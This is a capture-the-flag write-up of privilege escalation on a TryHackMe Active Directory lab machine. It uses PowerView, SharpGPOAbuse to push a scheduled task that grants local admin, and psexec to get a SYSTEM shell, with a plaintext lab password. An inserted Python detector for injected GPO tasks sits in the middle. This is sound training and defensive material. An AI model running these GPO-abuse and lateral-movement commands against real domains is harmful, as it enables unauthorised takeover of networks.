Privilege escalation
PS C:\Users\enterprise-security\Downloads> netstat -a -p TCP -o
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:88 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:135 VULNNET-BC3TCK1SHNQ:0 LISTENING 992
TCP 0.0.0.0:389 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:445 VULNNET-BC3TCK1SHNQ:0 LISTENING 4
TCP 0.0.0.0:464 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:593 VULNNET-BC3TCK1SHNQ:0 LISTENING 992
TCP 0.0.0.0:636 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:3268 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:3269 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:3389 VULNNET-BC3TCK1SHNQ:0 LISTENING 832
TCP 0.0.0.0:5985 VULNNET-BC3TCK1SHNQ:0 LISTENING 4
TCP 0.0.0.0:6379 VULNNET-BC3TCK1SHNQ:0 LISTENING 384
TCP 0.0.0.0:9389 VULNNET-BC3TCK1SHNQ:0 LISTENING 2276
TCP 0.0.0.0:47001 VULNNET-BC3TCK1SHNQ:0 LISTENING 4
TCP 0.0.0.0:49664 VULNNET-BC3TCK1SHNQ:0 LISTENING 636
TCP 0.0.0.0:49665 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:49666 VULNNET-BC3TCK1SHNQ:0 LISTENING 1028
TCP 0.0.0.0:49667 VULNNET-BC3TCK1SHNQ:0 LISTENING 836
TCP 0.0.0.0:49669 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:49670 VULNNET-BC3TCK1SHNQ:0 LISTENING 764
TCP 0.0.0.0:49684 VULNNET-BC3TCK1SHNQ:0 LISTENING 2232
TCP 0.0.0.0:49694 VULNNET-BC3TCK1SHNQ:0 LISTENING 2388
TCP 0.0.0.0:49699 VULNNET-BC3TCK1SHNQ:0 LISTENING 752
TCP 0.0.0.0:49710 VULNNET-BC3TCK1SHNQ:0 LISTENING 2352
TCP 10.10.69.113:53 VULNNET-BC3TCK1SHNQ:0 LISTENING 2388
TCP 10.10.69.113:139 VULNNET-BC3TCK1SHNQ:0 LISTENING 4
TCP 10.10.69.113:389 VULNNET-BC3TCK1SHNQ:49704 ESTABLISHED 764
TCP 10.10.69.113:389 VULNNET-BC3TCK1SHNQ:49708 ESTABLISHED 764
TCP 10.10.69.113:49704 VULNNET-BC3TCK1SHNQ:ldap ESTABLISHED 2352
TCP 10.10.69.113:49708 VULNNET-BC3TCK1SHNQ:ldap ESTABLISHED 2352
TCP 10.10.69.113:49909 ip-10-9-191-227:4321 ESTABLISHED 3968
TCP 10.10.69.113:49986 VULNNET-BC3TCK1SHNQ:49669 TIME_WAIT 0
TCP 127.0.0.1:53 VULNNET-BC3TCK1SHNQ:0 LISTENING 2388
------------------------------
Get powerview and upload it
┌──(kali㉿kali)-[~/thm/vulnnetactive]
└─$ wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
--2024-02-08 13:34:20-- https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.108.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 770279 (752K) [text/plain]
Saving to: ‘PowerView.ps1’
PowerView.ps1 100%[============================================================================>] 752.23K 2.60MB/s in 0.3s
2024-02-08 13:34:21 (2.60 MB/s) - ‘PowerView.ps1’ saved [770279/770279]
┌──(kali㉿kali)-[~/thm/vulnnetactive]
└─$ smbclient -I 10.10.69.113 -U 'enterprise-security' --password sand_0873959498 --client-protection sign '\\10.10.69.113\Enterprise-Share\'
Try "help" to get a list of possible commands.
smb: \> put PowerView.ps1
putting file PowerView.ps1 as \PowerView.ps1 (759.1 kb/s) (average 759.1 kb/s)
---------
Import module
PS C:\Users\enterprise-security\Downloads> Import-Module C:\Enterprise-Share\PowerView.ps1
PS C:\Users\enterprise-security\Downloads> Get-DomainGPO
usncreated : 5672
systemflags : -1946157056
displayname : security-pol-vn
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
whenchanged : 2/23/2021 11:09:44 PM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 20506
dscorepropagationdata : {2/23/2021 11:08:53 PM, 2/23/2021 9:32:08 AM, 1/1/1601 12:00:00 AM}
name : {31B2F340-016D-11D2-945F-00C04FB984F9}
flags : 0
cn : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\vulnnet.local\sysvol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedname : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vulnnet,DC=local
whencreated : 2/23/2021 9:30:33 AM
versionnumber : 3
instancetype : 4
objectguid : 9d593bf2-13ac-4df7-97a9-faff2abd3e2c
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vulnnet,DC=local
usncreated : 5675
systemflags : -1946157056
displayname : Default Domain Controllers Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 2/24/2021 12:14:52 AM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 24594
dscorepropagationdata : {2/23/2021 9:32:08 AM, 1/1/1601 12:00:00 AM}
name : {6AC1786C-016F-11D2-945F-00C04fB984F9}
flags : 0
cn : {6AC1786C-016F-11D2-945F-00C04fB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\vulnnet.local\sysvol\vulnnet.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
distinguishedname : CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=vulnnet,DC=local
whencreated : 2/23/2021 9:30:33 AM
versionnumber : 4
instancetype : 4
objectguid : 71ee1493-0079-40b4-80f0-8ba42c4f61d5
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vulnnet,DC=local
-------------------
smbclient -I 10.10.49.44 -U 'enterprise-security' --password sand_0873959498 --client-protection sign '\\10.10.49.44\sysvol'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Feb 23 04:29:58 2021
.. D 0 Tue Feb 23 04:29:58 2021
vulnnet.local Dr 0 Tue Feb 23 04:29:58 2021
9558271 blocks of size 4096. 5157762 blocks available
smb: \> cd vulnnet.local\Policies
smb: \vulnnet.local\Policies\> ls
. D 0 Tue Feb 23 04:30:37 2021
.. D 0 Tue Feb 23 04:30:37 2021
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Tue Feb 23 04:30:37 2021
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Tue Feb 23 04:30:37 2021
9558271 blocks of size 4096. 5157753 blocks available
smb: \vulnnet.local\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}
smb: \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
. D 0 Tue Feb 23 04:30:37 2021
.. D 0 Tue Feb 23 04:30:37 2021
GPT.INI A 22 Tue Feb 23 04:36:27 2021
MACHINE D 0 Tue Feb 23 16:58:25 2021
USER D 0 Tue Feb 23 04:30:37 2021
Download SharpGPOAbuse and upload it to the machine the same way as PowerView (via the Enterprise-Share share), then add an immediate scheduled task to the "security-pol-vn" GPO found above:
PS C:\Enterprise-Share> .\SharpGPOAbuse.exe --AddComputerTask --TaskName "makemeadmin" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN" --Force
[+] Domain = vulnnet.local
[+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local
[+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local
[+] GUID of "SECURITY-POL-VN" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Modifying \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
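From the defender's side, the artefact this step leaves behind is an ImmediateTaskV2 entry in the GPO's ScheduledTasks.xml under SYSVOL (the file SharpGPOAbuse reports modifying above). The following added example, not part of the writeup or of SharpGPOAbuse, parses such a file and flags immediate tasks that run a shell as SYSTEM or change local admin group membership; the sample XML is constructed to mirror what the command above would write, and the element and attribute names are assumed to follow the Group Policy Preferences scheduled-task format.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample of SYSVOL\...\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
# after an immediate task like the one in the writeup has been injected (GPP format assumed).
SAMPLE_SCHEDULED_TASKS_XML = """<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="makemeadmin"
      image="0" changed="2024-02-08 11:09:44" uid="{00000000-0000-0000-0000-000000000000}">
    <Properties action="C" name="makemeadmin" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3">
        <RegistrationInfo><Author>vulnnet\\administrator</Author></RegistrationInfo>
        <Principals><Principal id="Author"><UserId>NT AUTHORITY\\System</UserId>
          <RunLevel>HighestAvailable</RunLevel></Principal></Principals>
        <Actions Context="Author">
          <Exec><Command>cmd.exe</Command>
            <Arguments>/c net localgroup administrators enterprise-security /add</Arguments></Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
"""

# Interpreters that rarely belong in a legitimate GPO immediate task, and argument
# patterns that grant local admin rights or hide the real command.
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
SUSPICIOUS_ARGS = re.compile(
    r"net(1)?(\.exe)?\s+(localgroup|group)\s+administrators|"
    r"add-localgroupmember|-enc(odedcommand)?\s",
    re.IGNORECASE,
)


def find_suspicious_immediate_tasks(xml_text):
    """Return one finding dict per ImmediateTaskV2 whose Exec action looks like a privilege grant."""
    root = ET.fromstring(xml_text)
    findings = []
    for task in root.iter("ImmediateTaskV2"):
        props = task.find("Properties")
        run_as = (props.get("runAs", "") if props is not None else "").lower()
        author = task.findtext(".//RegistrationInfo/Author", default="")
        for exe in task.iter("Exec"):
            command = (exe.findtext("Command") or "").strip()
            args = (exe.findtext("Arguments") or "").strip()
            image = command.lower().rsplit("\\", 1)[-1]  # strip any path prefix
            reasons = []
            if image in SHELL_IMAGES:
                reasons.append("runs a shell interpreter")
            if SUSPICIOUS_ARGS.search(args):
                reasons.append("arguments modify local admin group or use an encoded command")
            if run_as.endswith("system"):
                reasons.append("runs as SYSTEM")
            if reasons:
                findings.append({"task": task.get("name"), "author": author,
                                 "command": command, "arguments": args, "reasons": reasons})
    return findings
```

Run it against every ScheduledTasks.xml under SYSVOL on a schedule, and pair it with a check that each GPO's GPT.INI version matches the versionNumber in AD, since the tool bumps both.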
----
net user enterprise-security
User name enterprise-security
Full Name Enterprise Security
Comment TryHackMe
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2021 3:01:37 PM
Password expires Never
Password changeable 2/24/2021 3:01:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/8/2024 11:10:09 AM
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *Domain Users
The command completed successfully.
--------
python psexec.py enterprise-security:sand_0873959498@10.10.49.44
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.49.44.....
[*] Found writable share ADMIN$
[*] Uploading file qludKPxL.exe
[*] Opening SVCManager on 10.10.49.44.....
[*] Creating service cvAd on 10.10.49.44.....
[*] Starting service cvAd.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1757]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system